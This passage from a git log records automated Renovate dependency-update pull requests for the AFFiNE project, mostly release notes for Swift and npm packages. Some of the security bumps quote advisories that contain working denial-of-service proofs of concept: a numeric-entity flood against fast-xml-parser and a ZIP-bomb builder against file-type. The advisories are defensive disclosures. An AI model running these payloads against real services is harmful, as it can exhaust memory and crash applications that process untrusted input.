swiftlang/github-workflows/.github/workflows/soundness.yml from 0.0.7 to 0.0.8 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​595](https://redirect.github.com/apple/swift-collections/pull/595) - Documentation updates for latest DocC by [@​lorentey](https://redirect.github.com/lorentey) in [#​596](https://redirect.github.com/apple/swift-collections/pull/596) - \[BasicContainers] Allow standalone use of the UnstableHashedContainers trait by [@​lorentey](https://redirect.github.com/lorentey) in [#​597](https://redirect.github.com/apple/swift-collections/pull/597) - Bump swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml from 0.0.7 to 0.0.8 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​594](https://redirect.github.com/apple/swift-collections/pull/594) - \[ContainersPreview] Rename Producer.generateNext() to next() by [@​lorentey](https://redirect.github.com/lorentey) in [#​599](https://redirect.github.com/apple/swift-collections/pull/599) - \[ContainersPreview] Remove BorrowingSequence.first by [@​lorentey](https://redirect.github.com/lorentey) in [#​598](https://redirect.github.com/apple/swift-collections/pull/598) - \[CI] Enable Android testing by [@​marcprux](https://redirect.github.com/marcprux) in [#​558](https://redirect.github.com/apple/swift-collections/pull/558) - \[BasicContainers] Assorted hashed container fixes and improvements by [@​lorentey](https://redirect.github.com/lorentey) in [#​601](https://redirect.github.com/apple/swift-collections/pull/601) - Flesh out BorrowingSequence/Container/Producer model a little more by [@​lorentey](https://redirect.github.com/lorentey) in [#​603](https://redirect.github.com/apple/swift-collections/pull/603) - More exploration of ownership-aware container/iterator algorithms by [@​lorentey](https://redirect.github.com/lorentey) in [#​605](https://redirect.github.com/apple/swift-collections/pull/605) #### New Contributors - [@​marcprux](https://redirect.github.com/marcprux) made their first contribution in [#​558](https://redirect.github.com/apple/swift-collections/pull/558) **Full Changelog**: <https://github.com/apple/swift-collections/compare/1.4.0...1.4.1> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
c1a09b951f |
chore: bump up fast-xml-parser version to v5.5.6 [SECURITY] (#14676)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [fast-xml-parser](https://redirect.github.com/NaturalIntelligence/fast-xml-parser) | [`5.4.1` → `5.5.6`](https://renovatebot.com/diffs/npm/fast-xml-parser/5.4.1/5.5.6) |  |  | ### GitHub Vulnerability Alerts #### [CVE-2026-33036](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r) ## Summary The fix for CVE-2026-26278 added entity expansion limits (`maxTotalExpansions`, `maxExpandedLength`, `maxEntityCount`, `maxEntitySize`) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. **Numeric character references** (`&#NNN;` and `&#xHH;`) and standard XML entities (`<`, `>`, etc.) are processed through a separate code path that does NOT enforce any expansion limits. An attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption. ## Affected Versions fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm) ## Root Cause In `src/xmlparser/OrderedObjParser.js`, the `replaceEntitiesValue()` function has two separate entity replacement loops: 1. **Lines 638-670**: DOCTYPE entities — expansion counting with `entityExpansionCount` and `currentExpandedLength` tracking. This was the CVE-2026-26278 fix. 2. **Lines 674-677**: `lastEntities` loop — replaces standard entities including `num_dec` (`/&#([0-9]{1,7});/g`) and `num_hex` (`/&#x([0-9a-fA-F]{1,6});/g`). **This loop has NO expansion counting at all.** The numeric entity regex replacements at lines 97-98 are part of `lastEntities` and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix. ## Proof of Concept ```javascript const { XMLParser } = require('fast-xml-parser'); // Even with strict explicit limits, numeric entities bypass them const parser = new XMLParser({ processEntities: { enabled: true, maxTotalExpansions: 10, maxExpandedLength: 100, maxEntityCount: 1, maxEntitySize: 10 } }); // 100K numeric entity references — should be blocked by maxTotalExpansions=10 const xml = `<root>${'&#​65;'.repeat(100000)}</root>`; const result = parser.parse(xml); // Output: 500,000 chars — bypasses maxExpandedLength=100 completely console.log('Output length:', result.root.length); // 500000 console.log('Expected max:', 100); // limit was 100 ``` **Results:** - 100K `&#​65;` references → 500,000 char output (5x default maxExpandedLength of 100,000) - 1M references → 5,000,000 char output, ~147MB memory consumed - Even with `maxTotalExpansions=10` and `maxExpandedLength=100`, 10K references produce 50,000 chars - Hex entities (`A`) exhibit the same bypass ## Impact **Denial of Service** — An attacker who can provide XML input to applications using fast-xml-parser can cause: - Excessive memory allocation (147MB+ for 1M entity references) - CPU consumption during regex replacement - Potential process crash via OOM This is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them. ## Suggested Fix Apply the same `entityExpansionCount` and `currentExpandedLength` tracking to the `lastEntities` loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670. ## Workaround Set `htmlEntities:false` --- ### Release Notes <details> <summary>NaturalIntelligence/fast-xml-parser (fast-xml-parser)</summary> ### [`v5.5.6`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/e54155f53048e9d58e27f170d3ccff15176b6671...870043e75e78545192bc70950c6286d36c7cdf23) [Compare Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6) ### [`v5.5.5`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/ea07bb2e8435a88136c0e46d7ee8a345107b7582...e54155f53048e9d58e27f170d3ccff15176b6671) [Compare Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.4...v5.5.5) ### [`v5.5.4`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...ea07bb2e8435a88136c0e46d7ee8a345107b7582) [Compare Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.4) ### [`v5.5.3`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3) [Compare Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3) ### [`v5.5.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...e0a14f7d15a293732e630ce1b7faa39924de2359) [Compare Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2) ### [`v5.5.1`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.1): integrate path-expression-matcher [Compare Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.0...v5.5.1) - support path-expression-matcher - fix: stopNode should not be parsed - performance improvement for stopNode checking ### [`v5.5.0`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...ce017923460f92861e8fc94c91e52f9f5bd6a1b0) [Compare Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...v5.5.0) ### [`v5.4.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2) [Compare Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
8f03090780 |
chore: bump up Lakr233/MarkdownView version to from: "3.8.2" (#14658)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView) | minor | `from: "3.6.3"` → `from: "3.8.2"` | --- ### Release Notes <details> <summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary> ### [`v3.8.2`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.1...3.8.2) [Compare Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.1...3.8.2) ### [`v3.8.1`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.0...3.8.1) [Compare Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.0...3.8.1) ### [`v3.8.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.7.0...3.8.0) [Compare Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.7.0...3.8.0) ### [`v3.7.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.3...3.7.0) [Compare Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.3...3.7.0) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
8125cc0e75 |
chore: bump up Lakr233/ListViewKit version to from: "1.2.0" (#14617)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [Lakr233/ListViewKit](https://redirect.github.com/Lakr233/ListViewKit) | minor | `from: "1.1.8"` → `from: "1.2.0"` | --- ### Release Notes <details> <summary>Lakr233/ListViewKit (Lakr233/ListViewKit)</summary> ### [`v1.2.0`](https://redirect.github.com/Lakr233/ListViewKit/compare/1.1.8...1.2.0) [Compare Source](https://redirect.github.com/Lakr233/ListViewKit/compare/1.1.8...1.2.0) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f537a75f01 |
chore: bump up file-type version to v21.3.2 [SECURITY] (#14655)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [file-type](https://redirect.github.com/sindresorhus/file-type) | [`21.3.1` → `21.3.2`](https://renovatebot.com/diffs/npm/file-type/21.3.1/21.3.2) |  |  | ### GitHub Vulnerability Alerts #### [CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473) ### Impact A denial of service vulnerability exists in the ASF (WMV/WMA) file type detection parser. When parsing a crafted input where an ASF sub-header has a `size` field of zero, the parser enters an infinite loop. The `payload` value becomes negative (-24), causing `tokenizer.ignore(payload)` to move the read position backwards, so the same sub-header is read repeatedly forever. Any application that uses `file-type` to detect the type of untrusted/attacker-controlled input is affected. An attacker can stall the Node.js event loop with a 55-byte payload. ### Patches Fixed in version 21.3.1. Users should upgrade to >= 21.3.1. ### Workarounds Validate or limit the size of input buffers before passing them to `file-type`, or run file type detection in a worker thread with a timeout. ### References - Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f ### Reporter crnkovic@lokvica.com #### [CVE-2026-32630](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-j47w-4g3g-c36v) ## Summary A crafted ZIP file can trigger excessive memory growth during type detection in `file-type` when using `fileTypeFromBuffer()`, `fileTypeFromBlob()`, or `fileTypeFromFile()`. In affected versions, the ZIP inflate output limit is enforced for stream-based detection, but not for known-size inputs. As a result, a small compressed ZIP can cause `file-type` to inflate and process a much larger payload while probing ZIP-based formats such as OOXML. In testing on `file-type` `21.3.1`, a ZIP of about `255 KB` caused about `257 MB` of RSS growth during `fileTypeFromBuffer()`. This is an availability issue. Applications that use these APIs on untrusted uploads can be forced to consume large amounts of memory and may become slow or crash. ## Root Cause The ZIP detection logic applied different limits depending on whether the tokenizer had a known file size. For stream inputs, ZIP probing was bounded by `maximumZipEntrySizeInBytes` (`1 MiB`). For known-size inputs such as buffers, blobs, and files, the code instead used `Number.MAX_SAFE_INTEGER` in two relevant places: ```js const maximumContentTypesEntrySize = hasUnknownFileSize(tokenizer) ? maximumZipEntrySizeInBytes : Number.MAX_SAFE_INTEGER; ``` and: ```js const maximumLength = hasUnknownFileSize(this.tokenizer) ? maximumZipEntrySizeInBytes : Number.MAX_SAFE_INTEGER; ``` Together, these checks allowed a crafted ZIP to bypass the intended inflate limit for known-size APIs and force large decompression during detection of entries such as `[Content_Types].xml`. ## Proof of Concept ```js import {fileTypeFromBuffer} from 'file-type'; import archiver from 'archiver'; import {Writable} from 'node:stream'; async function createZipBomb(sizeInMegabytes) { return new Promise((resolve, reject) => { const chunks = []; const writable = new Writable({ write(chunk, encoding, callback) { chunks.push(chunk); callback(); }, }); const archive = archiver('zip', {zlib: {level: 9}}); archive.pipe(writable); writable.on('finish', () => { resolve(Buffer.concat(chunks)); }); archive.on('error', reject); const xmlPrefix = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'; const padding = Buffer.alloc(sizeInMegabytes * 1024 * 1024 - xmlPrefix.length, 0x20); archive.append(Buffer.concat([Buffer.from(xmlPrefix), padding]), {name: '[Content_Types].xml'}); archive.finalize(); }); } const zip = await createZipBomb(256); console.log('ZIP size (KB):', (zip.length / 1024).toFixed(0)); const before = process.memoryUsage().rss; await fileTypeFromBuffer(zip); const after = process.memoryUsage().rss; console.log('RSS growth (MB):', ((after - before) / 1024 / 1024).toFixed(0)); ``` Observed on `file-type` `21.3.1`: - ZIP size: about `255 KB` - RSS growth during detection: about `257 MB` ## Affected APIs Affected: - `fileTypeFromBuffer()` - `fileTypeFromBlob()` - `fileTypeFromFile()` Not affected: - `fileTypeFromStream()`, which already enforced the ZIP inflate limit for unknown-size inputs ## Impact Applications that inspect untrusted uploads with `fileTypeFromBuffer()`, `fileTypeFromBlob()`, or `fileTypeFromFile()` can be forced to consume excessive memory during ZIP-based type detection. This can degrade service or lead to process termination in memory-constrained environments. ## Cause The issue was introduced in 399b0f1 --- ### Release Notes <details> <summary>sindresorhus/file-type (file-type)</summary> ### [`v21.3.2`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.2) [Compare Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2) - Fix ZIP bomb in known-size ZIP probing (GHSA-j47w-4g3g-c36v) [`a155cd7`](https://redirect.github.com/sindresorhus/file-type/commit/a155cd7) - Fix bound recursive BOM and ID3 detection [`370ed91`](https://redirect.github.com/sindresorhus/file-type/commit/370ed91) *** </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
9456a07889 |
chore: migrate Renovate config (#14656)
The Renovate config in this repository needs migrating. Typically this is because one or more configuration options you are using have been renamed. You don't need to merge this PR right away, because Renovate will continue to migrate these fields internally each time it runs. But later some of these fields may be fully deprecated and the migrations removed. So it's a good idea to merge this migration PR soon. 🔕 **Ignore**: Close this PR and you won't be reminded about config migration again, but one day your current config may no longer be valid. ❓ Got questions? Does something look wrong to you? Please don't hesitate to [request help here](https://redirect.github.com/renovatebot/renovate/discussions). --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
d7d67841b8 |
chore: bump up file-type version to v21.3.1 [SECURITY] (#14625)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [file-type](https://redirect.github.com/sindresorhus/file-type) | [`21.3.0` → `21.3.1`](https://renovatebot.com/diffs/npm/file-type/21.3.0/21.3.1) |  |  | ### GitHub Vulnerability Alerts #### [CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473) ### Impact A denial of service vulnerability exists in the ASF (WMV/WMA) file type detection parser. When parsing a crafted input where an ASF sub-header has a `size` field of zero, the parser enters an infinite loop. The `payload` value becomes negative (-24), causing `tokenizer.ignore(payload)` to move the read position backwards, so the same sub-header is read repeatedly forever. Any application that uses `file-type` to detect the type of untrusted/attacker-controlled input is affected. An attacker can stall the Node.js event loop with a 55-byte payload. ### Patches Fixed in version 21.3.1. Users should upgrade to >= 21.3.1. ### Workarounds Validate or limit the size of input buffers before passing them to `file-type`, or run file type detection in a worker thread with a timeout. ### References - Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f ### Reporter crnkovic@lokvica.com --- ### Release Notes <details> <summary>sindresorhus/file-type (file-type)</summary> ### [`v21.3.1`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.1) [Compare Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1) - Fix infinite loop in ASF parser on malformed input [`319abf8`](https://redirect.github.com/sindresorhus/file-type/commit/319abf8) *** </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
02744cec00 |
chore: bump up apple/swift-collections version to from: "1.4.0" (#14616)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | minor | `from: "1.3.0"` → `from: "1.4.0"` | --- ### Release Notes <details> <summary>apple/swift-collections (apple/swift-collections)</summary> ### [`v1.4.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.4.0): Swift Collections 1.4.0 [Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.3.0...1.4.0) This feature release supports Swift toolchain versions 6.0, 6.1 and 6.2. It includes a variety of bug fixes, and ships the following new features: ##### New ownership-aware ring buffer and hashed container implementations In the `DequeModule` module, we have two new source-stable types that provide ownership-aware ring buffer implementations: - [`struct UniqueDeque<Element>`][UniqueDeque] is a uniquely held, dynamically resizing, noncopyable deque. - [`struct RigidDeque<Element>`][RigidDeque] is a fixed-capacity deque implementation. `RigidDeque`/`UniqueDeque` are to `Deque` like `RigidArray`/`UniqueArray` are to `Array` -- they provide noncopyable embodiments of the same basic data structure, with many of the same operations. [UniqueDeque]: https://swiftpackageindex.com/apple/swift-collections/documentation/dequemodule/uniquedeque [RigidDeque]: https://swiftpackageindex.com/apple/swift-collections/documentation/dequemodule/rigiddeque In the `BasicContainers` module, this release adds previews of four new types, implementing ownership-aware hashed containers: - [`struct UniqueSet<Element>`][UniqueSet] is a uniquely held, dynamically resizing set. - [`struct RigidSet<Element>`][RigidSet] is a fixed-capacity set. - [`struct UniqueDictionary<Key, Value>`][UniqueDictionary] is a uniquely held, dynamically resizing dictionary. - [`struct RigidDictionary<Key, Value>`][RigidDictionary] is a fixed-capacity dictionary. [RigidSet]: https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/RigidSet [UniqueSet]: https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/UniqueSet [RigidDictionary]: https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/RigidDictionary [UniqueDictionary]: https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/UniqueDictionary These are direct analogues of the standard `Set` and `Dictionary` types. These types are built on top of the `Equatable` and `Hashable` protocol generalizations that were proposed in [SE-0499]; as that proposal is not yet implemented in any shipping toolchain, these new types are shipping as source-unstable previews, conditional on a new `UnstableHashedContainers` package trait. The final API of these types will also deeply depend on the `struct Borrow` and `struct Inout` proposals (and potentially other language/stdlib improvements) that are currently working their way through the Swift Evolution process. Accordingly, we may need to make source-breaking changes to the interfaces of these types -- they are not ready to be blessed as Public API. However, we encourage intrepid engineers to try them on for size, and report pain points. (Of which we expect there will be many in this first preview.) [SE-0499]: https://redirect.github.com/swiftlang/swift-evolution/blob/main/proposals/0499-support-non-copyable-simple-protocols.md We continue the pattern of `Rigid-` and `Unique-` naming prefixes with these new types: - The `Unique` types (`UniqueArray`, `UniqueDeque`, `UniqueSet`, `UniqueDictionary` etc.) are dynamically self-sizing containers that automatically reallocate their storage as needed to best accommodate their contents; the `Unique` prefix was chosen to highlight that these types are always uniquely held, avoiding the complications of mutating shared copies. - The `Rigid` types remove dynamic sizing, and they operate strictly within an explicitly configured capacity. Dynamic sizing is not always appropriate -- when targeting space- or time-constrained environments (think embedded use cases or real-time work), it is preferable to avoid implicit reallocations, and to instead choose to have explicit control over when (and if) storage is reallocated, and to what size. This is where the `Rigid` types come in: their instances are created with a specific capacity and it is a runtime error to exceed that. This makes them quite inflexible (hence the "rigid" qualifier), but in exchange, their operations provide far stricter complexity guarantees: they exhibit no random runtime latency spikes, and they can trivially fit in strict memory budgets. ##### Early drafts of borrowing sequence, generative iteration and container protocols This release includes highly experimental but *working* implementations of new protocols supplying ownership-aware alternatives to the classic `Sequence`/`Collection` protocol hierarchy. These protocols and the generic operations built on top of them can be turned on by enabling the `UnstableContainersPreview` package trait. - [`protocol BorrowingSequence<Element>`][BorrowingSequence] models borrowing sequences with ephemeral lifetimes. (This is already progressing through Swift Evolution.) - [`protocol Container<Element>`][Container] models constructs that physically store their contents, and can expose stable spans over them. - [`protocol Producer<Element, ProducerError>`][Producer] models a generative iterator -- a construct that generates items demand. - [`protocol Drain<Element>`][Drain] refines `Producer` to model an in-place consumable elements -- primarily for use around container types. [BorrowingSequence]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/BorrowingSequence.swift [BorrowingIteratorProtocol]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/BorrowingIteratorProtocol.swift [Container]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container.swift [Producer]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Producer.swift [Drain]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Drain.swift In this version, the package has developed these protocols just enough to implement basic generic operations for moving data between containers like `UniqueArray` and `RigidDeque`. As we gain experience using these, future releases may start adding basic generic algorithms, more protocols (bidirectional, random-access, (per)mutable, range-replaceable containers etc.) convenience adapters, and other features -- or we may end up entirely overhauling or simply discarding some/all of them. Accordingly, the experimental interfaces enabled by `UnstableContainersPreview` are not source stable, and they are not intended for production use. We expect the eventual production version of these (or whatever designs they evolve into) to ship in the Swift Standard Library. We do highly recommend interested folks to try playing with these, to get a feel for the strange problems of Ownership. Besides these protocols, the package also defines rudimentary substitutes of some basic primitives that belong in the Standard Library: - [`struct InputSpan<Element>`][InputSpan] the dual of `OutputSpan` -- while `OutputSpan` is primarily for moving items *into* somebody else's storage, `InputSpan` enables safely moving items *out of* storage. - [`struct Borrow<Target>`][Borrow] represents a borrowing reference to an item. (This package models this with a pointer, which is an ill-fitting substitute for the real implementation in the stdlib.) - [`struct Inout<Target>`][Inout] represents a mutating reference to an item. [InputSpan]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/InputSpan.swift [Borrow]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/Borrow.swift [Inout]: https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/Inout.swift ##### A formal way to access `SortedSet` and `SortedDictionary` types The `SortedCollections` module contains (preexisting) early drafts of two sorted collection types `SortedSet` and `SortedDictionary`, built on top of an in-memory B-tree implementation. This release defines an `UnstableSortedCollections` package trait that can be used to enable building these types for experimentation without manually modifying the package. Like in previous releases, these implementations remain unfinished in this release, with known API issues; accordingly, these types remain unstable. (Issue [#​1](https://redirect.github.com/apple/swift-collections/issues/1) remains open.) Future package releases may change their interface in ways that break source compatibility, or they may remove these types altogether. ##### Minor interface-level changes - The `Collections` module no longer uses the unstable `@_exported import` feature. Instead, it publishes public typealiases of every type that it previously reexported from `DequeModule`, `OrderedCollections`, `BitCollections`, `HeapModule` and `HashTreeCollections`. - We renamed some `RigidArray`/`UniqueArray` operations to improve their clarity at the point of use. The old names are still available, but deprecated. | Old name | New name | | ----------------------------------------------- | ------------------------------------------------- | | `append(count:initializingWith:)` | `append(addingCount:initializingWith:)` | | `insert(count:at:initializingWith:)` | `insert(addingCount:at:initializingWith:)` | | `replaceSubrange(_:newCount:initializingWith:)` | `replace(removing:addingCount:initializingWith:)` | | `replaceSubrange(_:moving:)` | `replace(removing:moving:)` | | `replaceSubrange(_:copying:)` | `replace(removing:copying:)` | | `copy()` | `clone()` | | `copy(capacity:)` | `clone(capacity:)` | - We have now defined a complete set of `OutputSpan`/`InputSpan`-based `append`/`insert`/`replace`/`consume` primitives, fully generalized to be implementable by piecewise contiguous containers. These operations pave the way for a `Container`-based analogue of the classic `RangeReplaceableCollection` protocol, with most of the user-facing operations becoming standard generic algorithms built on top of these primitives: ``` mutating func append<E: Error>( addingCount newItemCount: Int, initializingWith initializer: (inout OutputSpan<Element>) throws(E) -> Void ) mutating func insert<E: Error>( addingCount newItemCount: Int, at index: Int, initializingWith initializer: (inout OutputSpan<Element>) throws(E) -> Void ) throws(E) mutating func replace<E: Error>( removing subrange: Range<Int>, consumingWith consumer: (inout InputSpan<Element>) -> Void, addingCount newItemCount: Int, initializingWith initializer: (inout OutputSpan<Element>) throws(E) -> Void ) throws(E) mutating func consume( _ subrange: Range<Int>, consumingWith consumer: (inout InputSpan<Element>) -> Void ) ``` - The package no longer uses the code generation tool `gyb`. #### What's Changed - Fix links in GitHub templates by [@​lorentey](https://redirect.github.com/lorentey) in [#​527](https://redirect.github.com/apple/swift-collections/pull/527) - Adopt `package` access modifier and get rid of gybbing by [@​lorentey](https://redirect.github.com/lorentey) in [#​526](https://redirect.github.com/apple/swift-collections/pull/526) - \[Doc] Fix links in landing page by [@​Azoy](https://redirect.github.com/Azoy) in [#​531](https://redirect.github.com/apple/swift-collections/pull/531) - \[BigString] Refactor \_Chunk to be its own managed buffer of UTF8 by 